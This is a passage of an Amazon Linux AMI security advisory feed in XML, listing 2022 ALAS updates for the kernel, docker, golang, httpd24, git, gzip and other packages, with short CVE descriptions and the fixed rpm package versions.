In the Linux kernel before 5.17.1, a refcount leak bug was found in net/llc/af_llc.c.
CVE-2022-27666:
A heap buffer overflow flaw was found in IPsec ESP transformation code in net/ipv4/esp4.c and net/ipv6/esp6.c. This flaw allows a local attacker with a normal user privilege to overwrite kernel heap objects and may cause a local privilege escalation threat.
CVE-2022-26490:
A buffer overflow flaw was found in the Linux kernel's NFC protocol functionality. This flaw allows a local user to crash or escalate their privileges on the system.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26490" title="" id="CVE-2022-26490" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27666" title="" id="CVE-2022-27666" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28356" title="" id="CVE-2022-28356" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.14.275" release="142.503.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.275-142.503.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.275" release="142.503.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.275-142.503.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.275" release="142.503.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.275-142.503.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.275" release="142.503.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.275-142.503.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.275" release="142.503.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.275-142.503.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.275" release="142.503.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.275-142.503.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.275" release="142.503.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.275-142.503.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.275" release="142.503.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.275-142.503.amzn1.x86_64.rpm</filename></package><package 
name="kernel-tools-debuginfo" version="4.14.275" release="142.503.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.275-142.503.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.275" release="142.503.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.275-142.503.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.275" release="142.503.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.275-142.503.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.275" release="142.503.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.275-142.503.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.275" release="142.503.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.275-142.503.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.275" release="142.503.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.275-142.503.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.275" release="142.503.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.275-142.503.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.275" release="142.503.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.275-142.503.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.275" release="142.503.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.275-142.503.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.275" release="142.503.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.275-142.503.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.275" release="142.503.amzn1" epoch="0" 
arch="i686"><filename>Packages/perf-4.14.275-142.503.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.275" release="142.503.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.275-142.503.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1582</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1582: medium priority package update for containerd docker</title><issued date="2022-04-25 15:57:00" /><updated date="2022-04-28 21:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-24769:
A flaw was found in Moby (Docker Engine), where containers were started incorrectly with non-empty inheritable Linux process capabilities. This flaw allows an attacker with access to programs with inheritable file capabilities to elevate those capabilities to the permitted set when execve(2) runs. Containers using Linux users and groups to perform privilege separation inside the container are most directly impacted.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24769" title="" id="CVE-2022-24769" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="containerd" version="1.4.13" release="2.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-1.4.13-2.1.amzn1.x86_64.rpm</filename></package><package name="containerd-stress" version="1.4.13" release="2.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-stress-1.4.13-2.1.amzn1.x86_64.rpm</filename></package><package name="containerd-debuginfo" version="1.4.13" release="2.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-debuginfo-1.4.13-2.1.amzn1.x86_64.rpm</filename></package><package name="docker-debuginfo" version="20.10.13" release="2.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-debuginfo-20.10.13-2.1.amzn1.x86_64.rpm</filename></package><package name="docker" version="20.10.13" release="2.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-20.10.13-2.1.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1583</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1583: important priority package update for golang</title><issued date="2022-04-25 15:59:00" /><updated date="2024-01-03 22:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-44717:
There's a flaw in golang's syscall.ForkExec() interface. An attacker who manages to first cause a file descriptor exhaustion for the process, then cause syscall.ForkExec() to be called repeatedly, could compromise data integrity and/or confidentiality in a somewhat uncontrolled way in programs linked with and using syscall.ForkExec().
CVE-2021-44716:
There's an uncontrolled resource consumption flaw in golang's net/http library in the canonicalHeader() function. An attacker who submits specially crafted requests to applications linked with net/http's http2 functionality could cause excessive resource consumption that could lead to a denial of service or otherwise impact system performance and resources.
CVE-2021-41772:
A vulnerability was found in archive/zip of the Go standard library. Applications written in Go that use Reader.Open (the API implementing io/fs.FS introduced in Go 1.16) can panic when parsing a crafted ZIP archive containing completely invalid names or an empty filename argument.
CVE-2021-41771:
An out of bounds read vulnerability was found in debug/macho of the Go standard library. When using the debug/macho standard library (stdlib) and malformed binaries are parsed using Open or OpenFat, it can cause golang to attempt to read outside of a slice (array) causing a panic when calling ImportedSymbols. An attacker can use this vulnerability to craft a file which causes an application using this library to crash resulting in a denial of service.
CVE-2021-38297:
A validation flaw was found in golang. When invoking functions from WASM modules built using GOARCH=wasm GOOS=js, passing very large arguments can cause portions of the module to be overwritten with data from the arguments. The highest threat from this vulnerability is to integrity.
CVE-2021-27919:
An out of bounds read vulnerability was found in golang. When using the archive/zip standard library (stdlib) and an unexpected file is parsed, it can cause golang to attempt to read outside of a slice (array) causing a panic in the runtime. A potential attacker can use this vulnerability to craft an archive which causes an application using this library to crash resulting in a Denial of Service (DoS).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27919" title="" id="CVE-2021-27919" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38297" title="" id="CVE-2021-38297" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41771" title="" id="CVE-2021-41771" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41772" title="" id="CVE-2021-41772" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716" title="" id="CVE-2021-44716" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44717" title="" id="CVE-2021-44717" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-bin" version="1.16.15" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.16.15-1.37.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.16.15" release="1.37.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.16.15-1.37.amzn1.noarch.rpm</filename></package><package name="golang" version="1.16.15" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.16.15-1.37.amzn1.x86_64.rpm</filename></package><package name="golang-tests" version="1.16.15" release="1.37.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.16.15-1.37.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.16.15" release="1.37.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.16.15-1.37.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.16.15" release="1.37.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.16.15-1.37.amzn1.noarch.rpm</filename></package><package name="golang-race" version="1.16.15" release="1.37.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/golang-race-1.16.15-1.37.amzn1.x86_64.rpm</filename></package><package name="golang-shared" version="1.16.15" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-shared-1.16.15-1.37.amzn1.x86_64.rpm</filename></package><package name="golang-shared" version="1.16.15" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/golang-shared-1.16.15-1.37.amzn1.i686.rpm</filename></package><package name="golang" version="1.16.15" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.16.15-1.37.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.16.15" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.16.15-1.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1584</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1584: important priority package update for httpd24</title><issued date="2022-04-26 17:12:00" /><updated date="2022-04-28 21:44:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-23943:
An out-of-bounds read/write vulnerability was found in the mod_sed module of httpd. This flaw allows an attacker to overwrite the memory of an httpd instance that is using mod_sed with data provided by the attacker.
CVE-2022-22721:
A flaw was found in httpd, where it incorrectly limits the value of the LimitXMLRequestBody option. This issue can lead to an integer overflow and later causes an out-of-bounds write.
CVE-2022-22720:
A flaw was found in httpd. The inbound connection is not closed when it fails to discard the request body, which may expose the server to HTTP request smuggling.
CVE-2022-22719:
A flaw was found in the mod_lua module of httpd. A crafted request body can cause a read to a random memory area due to an uninitialized value in functions called by the parsebody function. The highest threat from this vulnerability is to availability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22719" title="" id="CVE-2022-22719" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22720" title="" id="CVE-2022-22720" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22721" title="" id="CVE-2022-22721" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23943" title="" id="CVE-2022-23943" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_session" version="2.4.53" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.53-1.96.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.53" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.53-1.96.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.53" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.53-1.96.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.53" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.53-1.96.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.53" release="1.96.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.53-1.96.amzn1.noarch.rpm</filename></package><package name="mod24_ldap" version="2.4.53" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.53-1.96.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.53" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.53-1.96.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.53" release="1.96.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.53-1.96.amzn1.x86_64.rpm</filename></package><package 
name="mod24_md" version="2.4.53" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.53-1.96.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.53" release="1.96.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.53-1.96.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.53" release="1.96.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.53-1.96.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.53" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.53-1.96.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.53" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.53-1.96.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.53" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.53-1.96.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.53" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.53-1.96.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.53" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.53-1.96.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.53" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.53-1.96.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.53" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.53-1.96.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.53" release="1.96.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.53-1.96.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2022-1585</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1585: critical priority package update for xmlrpc-c</title><issued date="2022-05-20 22:12:00" /><updated date="2022-05-24 01:25:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-25235:
A flaw was found in expat. Passing malformed 2- and 3-byte UTF-8 sequences (for example, from start tag names) to the XML processing application on top of expat can lead to arbitrary code execution. This issue is dependent on how invalid UTF-8 is handled inside the XML processor.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25235" title="" id="CVE-2022-25235" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xmlrpc-c-client" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlrpc-c-client-1.22.04-r1934.7.amzn1.x86_64.rpm</filename></package><package name="xmlrpc-c-client++" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlrpc-c-client++-1.22.04-r1934.7.amzn1.x86_64.rpm</filename></package><package name="xmlrpc-c" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlrpc-c-1.22.04-r1934.7.amzn1.x86_64.rpm</filename></package><package name="xmlrpc-c-debuginfo" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlrpc-c-debuginfo-1.22.04-r1934.7.amzn1.x86_64.rpm</filename></package><package name="xmlrpc-c-devel" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlrpc-c-devel-1.22.04-r1934.7.amzn1.x86_64.rpm</filename></package><package name="xmlrpc-c-c++" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlrpc-c-c++-1.22.04-r1934.7.amzn1.x86_64.rpm</filename></package><package name="xmlrpc-c-apps" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlrpc-c-apps-1.22.04-r1934.7.amzn1.x86_64.rpm</filename></package><package name="xmlrpc-c-debuginfo" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="i686"><filename>Packages/xmlrpc-c-debuginfo-1.22.04-r1934.7.amzn1.i686.rpm</filename></package><package name="xmlrpc-c-apps" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="i686"><filename>Packages/xmlrpc-c-apps-1.22.04-r1934.7.amzn1.i686.rpm</filename></package><package name="xmlrpc-c" version="1.22.04" release="r1934.7.amzn1" epoch="0" 
arch="i686"><filename>Packages/xmlrpc-c-1.22.04-r1934.7.amzn1.i686.rpm</filename></package><package name="xmlrpc-c-c++" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="i686"><filename>Packages/xmlrpc-c-c++-1.22.04-r1934.7.amzn1.i686.rpm</filename></package><package name="xmlrpc-c-client++" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="i686"><filename>Packages/xmlrpc-c-client++-1.22.04-r1934.7.amzn1.i686.rpm</filename></package><package name="xmlrpc-c-client" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="i686"><filename>Packages/xmlrpc-c-client-1.22.04-r1934.7.amzn1.i686.rpm</filename></package><package name="xmlrpc-c-devel" version="1.22.04" release="r1934.7.amzn1" epoch="0" arch="i686"><filename>Packages/xmlrpc-c-devel-1.22.04-r1934.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1586</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1586: critical priority package update for openldap</title><issued date="2022-05-20 22:13:00" /><updated date="2022-05-24 01:27:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-29155:
In OpenLDAP 2.x before 2.5.12 and 2.6.x before 2.6.2, a SQL injection vulnerability exists in the experimental back-sql backend to slapd, via a SQL statement within an LDAP query. This can occur during an LDAP search operation when the search filter is processed, due to a lack of proper escaping.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29155" title="" id="CVE-2022-29155" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openldap-servers-sql" version="2.4.40" release="16.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-sql-2.4.40-16.32.amzn1.x86_64.rpm</filename></package><package name="openldap-servers-sql" version="2.4.40" release="16.32.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-sql-2.4.40-16.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1587</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1587: important priority package update for aide</title><issued date="2022-05-31 23:47:00" /><updated date="2022-06-09 18:39:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-45417:
A heap-based buffer overflow vulnerability in the base64 functions of AIDE, an advanced intrusion detection system. An attacker could crash the program and possibly execute arbitrary code through large (<16k) extended file attributes or ACL.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45417" title="" id="CVE-2021-45417" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="aide" version="0.14" release="7.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/aide-0.14-7.9.amzn1.x86_64.rpm</filename></package><package name="aide-debuginfo" version="0.14" release="7.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/aide-debuginfo-0.14-7.9.amzn1.x86_64.rpm</filename></package><package name="aide" version="0.14" release="7.9.amzn1" epoch="0" arch="i686"><filename>Packages/aide-0.14-7.9.amzn1.i686.rpm</filename></package><package name="aide-debuginfo" version="0.14" release="7.9.amzn1" epoch="0" arch="i686"><filename>Packages/aide-debuginfo-0.14-7.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1588</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1588: medium priority package update for expat</title><issued date="2022-05-31 23:47:00" /><updated date="2022-06-09 18:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-45960:
In Expat (aka libexpat) before 2.4.3, a left shift by 29 (or more) places in the storeAtts function in xmlparse.c can lead to realloc misbehavior (e.g., allocating too few bytes, or only freeing memory).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45960" title="" id="CVE-2021-45960" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="expat-debuginfo" version="2.1.0" release="12.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-debuginfo-2.1.0-12.28.amzn1.x86_64.rpm</filename></package><package name="expat-devel" version="2.1.0" release="12.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.1.0-12.28.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="12.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.1.0-12.28.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="12.28.amzn1" epoch="0" arch="i686"><filename>Packages/expat-2.1.0-12.28.amzn1.i686.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="12.28.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.1.0-12.28.amzn1.i686.rpm</filename></package><package name="expat-devel" version="2.1.0" release="12.28.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.1.0-12.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1589</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1589: medium priority package update for git</title><issued date="2022-05-31 23:47:00" /><updated date="2022-06-09 18:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-24765:
A vulnerability was found in Git. This flaw occurs due to Git not checking the ownership of directories in a local multi-user system when running commands specified in the local repository configuration. This allows the owner of the repository to cause arbitrary commands to be executed by other users who access the repository.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24765" title="" id="CVE-2022-24765" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-svn" version="2.36.1" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.36.1-1.75.amzn1.x86_64.rpm</filename></package><package name="emacs-git-el" version="2.36.1" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.36.1-1.75.amzn1.noarch.rpm</filename></package><package name="git-p4" version="2.36.1" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.36.1-1.75.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.36.1" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.36.1-1.75.amzn1.noarch.rpm</filename></package><package name="git-core" version="2.36.1" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-core-2.36.1-1.75.amzn1.x86_64.rpm</filename></package><package name="perl-Git-SVN" version="2.36.1" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.36.1-1.75.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.36.1" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.36.1-1.75.amzn1.x86_64.rpm</filename></package><package name="git-hg" version="2.36.1" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.36.1-1.75.amzn1.noarch.rpm</filename></package><package name="git-core-doc" version="2.36.1" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/git-core-doc-2.36.1-1.75.amzn1.noarch.rpm</filename></package><package name="gitweb" version="2.36.1" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.36.1-1.75.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.36.1" release="1.75.amzn1" epoch="0" 
arch="noarch"><filename>Packages/git-email-2.36.1-1.75.amzn1.noarch.rpm</filename></package><package name="git-instaweb" version="2.36.1" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-instaweb-2.36.1-1.75.amzn1.x86_64.rpm</filename></package><package name="perl-Git" version="2.36.1" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.36.1-1.75.amzn1.noarch.rpm</filename></package><package name="git-all" version="2.36.1" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.36.1-1.75.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.36.1" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.36.1-1.75.amzn1.x86_64.rpm</filename></package><package name="emacs-git" version="2.36.1" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.36.1-1.75.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.36.1" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.36.1-1.75.amzn1.noarch.rpm</filename></package><package name="git" version="2.36.1" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.36.1-1.75.amzn1.x86_64.rpm</filename></package><package name="git-subtree" version="2.36.1" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-subtree-2.36.1-1.75.amzn1.x86_64.rpm</filename></package><package name="git-subtree" version="2.36.1" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/git-subtree-2.36.1-1.75.amzn1.i686.rpm</filename></package><package name="git" version="2.36.1" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.36.1-1.75.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.36.1" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.36.1-1.75.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.36.1" release="1.75.amzn1" epoch="0" 
arch="i686"><filename>Packages/git-svn-2.36.1-1.75.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.36.1" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.36.1-1.75.amzn1.i686.rpm</filename></package><package name="git-instaweb" version="2.36.1" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/git-instaweb-2.36.1-1.75.amzn1.i686.rpm</filename></package><package name="git-core" version="2.36.1" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/git-core-2.36.1-1.75.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1590</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1590: important priority package update for gzip</title><issued date="2022-05-31 23:47:00" /><updated date="2022-06-09 18:43:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-1271:
An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied to an attacker-chosen file name (for example, a crafted file name), it can write attacker-controlled content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing file names with two or more newlines, where the selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low-privileged attacker to force zgrep to write arbitrary files on the system.
